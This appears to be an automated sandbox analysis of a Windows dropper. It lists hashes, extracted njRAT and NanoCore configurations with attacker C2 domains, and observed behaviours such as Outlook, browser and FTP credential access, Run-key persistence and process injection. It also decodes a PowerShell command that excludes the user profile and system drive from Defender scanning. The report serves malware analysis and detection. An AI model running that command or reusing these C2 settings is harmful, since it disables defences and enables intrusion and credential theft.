Analysis
max time kernel: 149s
max time network: 150s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 06/01/2024, 18:17

Static task: static1
Behavioral task: behavioral1
  Sample: 80C6039DC12399E3F771632F0A44C4C3.exe
  Resource: win7-20231129-en
Behavioral task: behavioral2
  Sample: 80C6039DC12399E3F771632F0A44C4C3.exe
  Resource: win10v2004-20231215-en
General
Target: 80C6039DC12399E3F771632F0A44C4C3.exe
Size: 1.6MB
MD5: 80c6039dc12399e3f771632f0a44c4c3
SHA1: f609ba2e8bc0d4b395b83f38a4867fcdb9b6bfdd
SHA256: f6b10c59c9ce33c5c8f6b02c3293fe5d479e59542698c91b15af74bcce50ab8f
SHA512: 83b8fb0f9943c11012a82049d7861a3b7ec9753036de402c82ac433a5235cb95a104dd69b29ed110cd9dfe3b8ab062d916956f6f66864bf79876e926c2c5a6a5
SSDEEP: 49152:2dh0Omwse7edN51glfneOTS9rFJMkn4Rli/Ea:2dcwN25efeIS9rF6k4RQM
Malware Config

Extracted
Family: njrat
Version: 0.7d
Botnet: stupids
C2: hakim32.ddns.net:2000
C2: hands-social.at.ply.gg:46242
Mutex: d4529f156f8f79f81b02518c9cf09857
Attributes:
  reg_key: d4529f156f8f79f81b02518c9cf09857
  splitter: |'|'|

Extracted
Family: nanocore
Version: 1.2.2.0
C2: links-transition.gl.at.ply.gg:41958
C2: 127.0.0.1:41958
Mutex: 973dbaac-5242-4f6a-aaef-307dad24cdde
Attributes:
  activate_away_mode: true
  backup_connection_host: 127.0.0.1
  backup_dns_server: 8.8.4.4
  buffer_size: 65535
  build_time: 2023-10-14T03:00:38.071092836Z
  bypass_user_account_control: true
  bypass_user_account_control_data:
  clear_access_control: true
  clear_zone_identifier: false
  connect_delay: 4000
  connection_port: 41958
  default_group: Default
  enable_debug_mode: true
  gc_threshold: 1.048576e+07
  keep_alive_timeout: 30000
  keyboard_logging: false
  lan_timeout: 2500
  max_packet_size: 1.048576e+07
  mutex: 973dbaac-5242-4f6a-aaef-307dad24cdde
  mutex_timeout: 5000
  prevent_system_sleep: false
  primary_connection_host: links-transition.gl.at.ply.gg
  primary_dns_server: 8.8.8.8
  request_elevation: true
  restart_delay: 5000
  run_delay: 0
  run_on_startup: false
  set_critical_process: true
  timeout_interval: 5000
  use_custom_dns_server: false
  version: 1.2.2.0
  wan_timeout: 8000
Signatures

NirSoft MailPassView 4 IoCs
Password recovery tool for various email clients
resource | yara_rule
behavioral1/memory/768-112-0x0000000000400000-0x000000000041B000-memory.dmp | MailPassView
behavioral1/memory/768-108-0x0000000000400000-0x000000000041B000-memory.dmp | MailPassView
behavioral1/memory/768-106-0x0000000000400000-0x000000000041B000-memory.dmp | MailPassView
behavioral1/memory/768-117-0x0000000000400000-0x000000000041B000-memory.dmp | MailPassView

Nirsoft 4 IoCs
resource | yara_rule
behavioral1/memory/768-112-0x0000000000400000-0x000000000041B000-memory.dmp | Nirsoft
behavioral1/memory/768-108-0x0000000000400000-0x000000000041B000-memory.dmp | Nirsoft
behavioral1/memory/768-106-0x0000000000400000-0x000000000041B000-memory.dmp | Nirsoft
behavioral1/memory/768-117-0x0000000000400000-0x000000000041B000-memory.dmp | Nirsoft

Executes dropped EXE 6 IoCs
pid | Process
2192 | shadowscripts fixed.exe
2852 | microsofts.exe
3032 | sanas.scr
2640 | FreeScript.exe
2632 | Server.exe
2740 | Server2223.exe

Loads dropped DLL 8 IoCs
pid | Process
3060 | 80C6039DC12399E3F771632F0A44C4C3.exe
3060 | 80C6039DC12399E3F771632F0A44C4C3.exe
3060 | 80C6039DC12399E3F771632F0A44C4C3.exe
3060 | 80C6039DC12399E3F771632F0A44C4C3.exe
2192 | shadowscripts fixed.exe
2192 | shadowscripts fixed.exe
2192 | shadowscripts fixed.exe
2192 | shadowscripts fixed.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Uses the VBS compiler for execution 1 TTPs

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | vbc.exe

Adds Run key to start application 2 TTPs 3 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Server.exe" | Server.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\TCP Service = "C:\\Program Files (x86)\\TCP Service\\tcpsv.exe" | microsofts.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sanas.scr" | sanas.scr
Checks whether UAC is enabled
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | microsofts.exe
Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 2852 set thread context of 768 | 2852 | microsofts.exe | 38
PID 2852 set thread context of 2936 | 2852 | microsofts.exe | 39

Drops file in Program Files directory 2 IoCs
description | ioc | Process
File created | C:\Program Files (x86)\TCP Service\tcpsv.exe | microsofts.exe
File opened for modification | C:\Program Files (x86)\TCP Service\tcpsv.exe | microsofts.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses 12 IoCs
pid | Process
3012 | powershell.exe
320 | powershell.exe
2852 | microsofts.exe
2852 | microsofts.exe
2852 | microsofts.exe
2852 | microsofts.exe
2852 | microsofts.exe
2852 | microsofts.exe
2852 | microsofts.exe
2852 | microsofts.exe
2852 | microsofts.exe
2936 | vbc.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid | Process
2852 | microsofts.exe
3032 | sanas.scr

Suspicious use of AdjustPrivilegeToken 3 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3012 | powershell.exe
Token: SeDebugPrivilege | 320 | powershell.exe
Token: SeDebugPrivilege | 2852 | microsofts.exe

Suspicious use of FindShellTrayWindow 2 IoCs
pid | Process
3032 | sanas.scr
2632 | Server.exe

Suspicious use of SetWindowsHookEx 2 IoCs
pid | Process
3032 | sanas.scr
2632 | Server.exe

Suspicious use of WriteProcessMemory 52 IoCs
description | pid | Process | procid_target
PID 3060 wrote to memory of 2192 | 3060 | 80C6039DC12399E3F771632F0A44C4C3.exe | 28
PID 3060 wrote to memory of 2192 | 3060 | 80C6039DC12399E3F771632F0A44C4C3.exe | 28
PID 3060 wrote to memory of 2192 | 3060 | 80C6039DC12399E3F771632F0A44C4C3.exe | 28
PID 3060 wrote to memory of 2192 | 3060 | 80C6039DC12399E3F771632F0A44C4C3.exe | 28
PID 3060 wrote to memory of 2852 | 3060 | 80C6039DC12399E3F771632F0A44C4C3.exe | 37
PID 3060 wrote to memory of 2852 | 3060 | 80C6039DC12399E3F771632F0A44C4C3.exe | 37
PID 3060 wrote to memory of 2852 | 3060 | 80C6039DC12399E3F771632F0A44C4C3.exe | 37
PID 3060 wrote to memory of 2852 | 3060 | 80C6039DC12399E3F771632F0A44C4C3.exe | 37
PID 3060 wrote to memory of 3032 | 3060 | 80C6039DC12399E3F771632F0A44C4C3.exe | 36
PID 3060 wrote to memory of 3032 | 3060 | 80C6039DC12399E3F771632F0A44C4C3.exe | 36
PID 3060 wrote to memory of 3032 | 3060 | 80C6039DC12399E3F771632F0A44C4C3.exe | 36
PID 3060 wrote to memory of 3032 | 3060 | 80C6039DC12399E3F771632F0A44C4C3.exe | 36
PID 2192 wrote to memory of 320 | 2192 | shadowscripts fixed.exe | 35
PID 2192 wrote to memory of 320 | 2192 | shadowscripts fixed.exe | 35
PID 2192 wrote to memory of 320 | 2192 | shadowscripts fixed.exe | 35
PID 2192 wrote to memory of 320 | 2192 | shadowscripts fixed.exe | 35
PID 2192 wrote to memory of 3012 | 2192 | shadowscripts fixed.exe | 30
PID 2192 wrote to memory of 3012 | 2192 | shadowscripts fixed.exe | 30
PID 2192 wrote to memory of 3012 | 2192 | shadowscripts fixed.exe | 30
PID 2192 wrote to memory of 3012 | 2192 | shadowscripts fixed.exe | 30
PID 2192 wrote to memory of 2640 | 2192 | shadowscripts fixed.exe | 31
PID 2192 wrote to memory of 2640 | 2192 | shadowscripts fixed.exe | 31
PID 2192 wrote to memory of 2640 | 2192 | shadowscripts fixed.exe | 31
PID 2192 wrote to memory of 2640 | 2192 | shadowscripts fixed.exe | 31
PID 2192 wrote to memory of 2632 | 2192 | shadowscripts fixed.exe | 33
PID 2192 wrote to memory of 2632 | 2192 | shadowscripts fixed.exe | 33
PID 2192 wrote to memory of 2632 | 2192 | shadowscripts fixed.exe | 33
PID 2192 wrote to memory of 2632 | 2192 | shadowscripts fixed.exe | 33
PID 2192 wrote to memory of 2740 | 2192 | shadowscripts fixed.exe | 32
PID 2192 wrote to memory of 2740 | 2192 | shadowscripts fixed.exe | 32
PID 2192 wrote to memory of 2740 | 2192 | shadowscripts fixed.exe | 32
PID 2192 wrote to memory of 2740 | 2192 | shadowscripts fixed.exe | 32
PID 2852 wrote to memory of 768 | 2852 | microsofts.exe | 38
PID 2852 wrote to memory of 768 | 2852 | microsofts.exe | 38
PID 2852 wrote to memory of 768 | 2852 | microsofts.exe | 38
PID 2852 wrote to memory of 768 | 2852 | microsofts.exe | 38
PID 2852 wrote to memory of 768 | 2852 | microsofts.exe | 38
PID 2852 wrote to memory of 768 | 2852 | microsofts.exe | 38
PID 2852 wrote to memory of 768 | 2852 | microsofts.exe | 38
PID 2852 wrote to memory of 768 | 2852 | microsofts.exe | 38
PID 2852 wrote to memory of 768 | 2852 | microsofts.exe | 38
PID 2852 wrote to memory of 768 | 2852 | microsofts.exe | 38
PID 2852 wrote to memory of 2936 | 2852 | microsofts.exe | 39
PID 2852 wrote to memory of 2936 | 2852 | microsofts.exe | 39
PID 2852 wrote to memory of 2936 | 2852 | microsofts.exe | 39
PID 2852 wrote to memory of 2936 | 2852 | microsofts.exe | 39
PID 2852 wrote to memory of 2936 | 2852 | microsofts.exe | 39
PID 2852 wrote to memory of 2936 | 2852 | microsofts.exe | 39
PID 2852 wrote to memory of 2936 | 2852 | microsofts.exe | 39
PID 2852 wrote to memory of 2936 | 2852 | microsofts.exe | 39
PID 2852 wrote to memory of 2936 | 2852 | microsofts.exe | 39
PID 2852 wrote to memory of 2936 | 2852 | microsofts.exe | 39
Processes

C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe (level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID: 3060

    C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe (level 2)
      Command line: "C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID: 2192

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcAB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZQBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAeQBqACMAPgA="
          Decoded (base64, UTF-16LE): <#npb#>Add-MpPreference <#mpx#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#eem#> -Force <#pyj#>
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 3012

        C:\Users\Admin\AppData\Local\Temp\FreeScript.exe (level 3)
          Command line: "C:\Users\Admin\AppData\Local\Temp\FreeScript.exe"
          - Executes dropped EXE
          PID: 2640

        C:\Users\Admin\AppData\Local\Temp\Server2223.exe (level 3)
          Command line: "C:\Users\Admin\AppData\Local\Temp\Server2223.exe"
          - Executes dropped EXE
          PID: 2740

        C:\Users\Admin\AppData\Local\Temp\Server.exe (level 3)
          Command line: "C:\Users\Admin\AppData\Local\Temp\Server.exe"
          - Executes dropped EXE
          - Adds Run key to start application
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of SetWindowsHookEx
          PID: 2632

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGoAcQB3ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAaQBmACAAZQByAHIAbwByAHMAIABjAG8AbgB0AGEAYwB0ACAAbQBlACAAbQBhAGkAawBrAGkANAAyADAAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHMAbABwACMAPgA="
          Decoded (base64, UTF-16LE): <#kee#>Add-Type -AssemblyName System.Windows.Forms;<#jqw#>[System.Windows.Forms.MessageBox]::Show('if errors contact me maikki420','','OK','Information')<#slp#>
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 320

    C:\Users\Admin\AppData\Local\Temp\sanas.scr (level 2)
      Command line: "C:\Users\Admin\AppData\Local\Temp\sanas.scr" /S
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      PID: 3032

    C:\Users\Admin\AppData\Local\Temp\microsofts.exe (level 2)
      Command line: "C:\Users\Admin\AppData\Local\Temp\microsofts.exe"
      - Executes dropped EXE
      - Adds Run key to start application
      - Checks whether UAC is enabled
      - Suspicious use of SetThreadContext
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2852

        \??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe (level 3)
          Command line: "c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\0bvuh0yt.zfe"
          - Accesses Microsoft Outlook accounts
          PID: 768

        \??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe (level 3)
          Command line: "c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\qad1ehsl.ym4"
          - Suspicious behavior: EnumeratesProcesses
          PID: 2936
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 523B
MD5: 69b2a2e17e78d24abee9f1de2f04811a
SHA1: d19c109704e83876ab3527457f9418a7d053aa33
SHA256: 1b1491f21e64681f8fdc27b2265e2274fb7813eecb6ad8b446d2e431f6300edd
SHA512: eb7269979bc4187520636fe3d7b3089f2c7c02e81c4ce2a738ade680f72c61c67fe9577eeaa09d3ca93f34b60be8c434d2cfbfed6566e783f6611279f056150f

Filesize: 913KB
MD5: 799c188cf6df366f4c0f98b8800a4977
SHA1: 161d6006518879ecba6cf45b29599992d8eadfce
SHA256: 32e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841
SHA512: 32a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1

Filesize: 93KB
MD5: 86757f6c08b6cb698250cc9fc1816a8e
SHA1: fa8a2fbc982943a031ad202b3e4b1cdb11bcff6a
SHA256: 98fa9c5139362be3e25333a7c48229ed220cc61c0dc41b8270e66d2886aa7dff
SHA512: cb87cf73deda4299561af9e7c4d65a82816ca5f82890edd76cfec258dbf973b197cd6c40bca2f8643d39f451072e71c5f9529864689cc68097a4382bec97a7dc

Filesize: 202KB
MD5: 5fdd418baf9c0d789e67758ad9f2dd1a
SHA1: c0be3be193af670cfe01a64aef7c5b0a0b9d091a
SHA256: 82f59d1a1a65c0651ae7a965bb6481ba1351ea9efc9f9457de372043709e5a47
SHA512: 9ace7aed4e4db6f2df7a8df22227079acf176cb7b7e90a0d2638dfd44296653fae6194531a7335fb10fd9396f3cd4f11621715b2a2e4f948209055a809b00c50

Filesize: 897KB
MD5: cff6bd15ff11608502d43c19584783a7
SHA1: 740c5153ee4e4799d75758007195c6bf0c5d4a40
SHA256: 0cb43babac1cc190cd461163307ea306f8cf14688889ce6aaa77b1c7548b85bd
SHA512: c75fc0bb4abed4fe6dbe74e74dbdc9bf311996aaf7a8dc7870e573d6d6be33d7ce0cc5130160f2099fd6f15c1389c48f909322e5a1fda385dcc8a260c9858e8d

Filesize: 183KB
MD5: b7cedaa564e3fb095f94aef59f7ed0da
SHA1: 3f93a84f2d290840cfb5418e15c47dda39ab967d
SHA256: 526a5aae8d6af5d4af48bef2bf37f6a79b1584b7b48d32bef6a2f6f4ee69ccfc
SHA512: 18d274dba047179d7cc6b2bb14ede76618bf5c93d8a4b4d1a32bbcf2f6494c9ecc4a601a5a4eae5d7672967be5c3a0c5bfc402f97626638ba7825d6412538f7d

Filesize: 1.0MB
MD5: 5f2ee29ef8f1d3ce52051b89eb690636
SHA1: 06ac76ef4070e0f0144f151f0ed927042789258a
SHA256: bd2faaed9c8559f55ee3bfce7658b27dc21cfc5606c665561401dc5fdad7c14b
SHA512: bcc2b3e8e2032c58daa2ed554888b97c34cc60e085f713cce5f5593aec0f7ad4213cd684e3e1e1ff06ac8466342f6e2c9a9133531d2579649a06f397d26b3800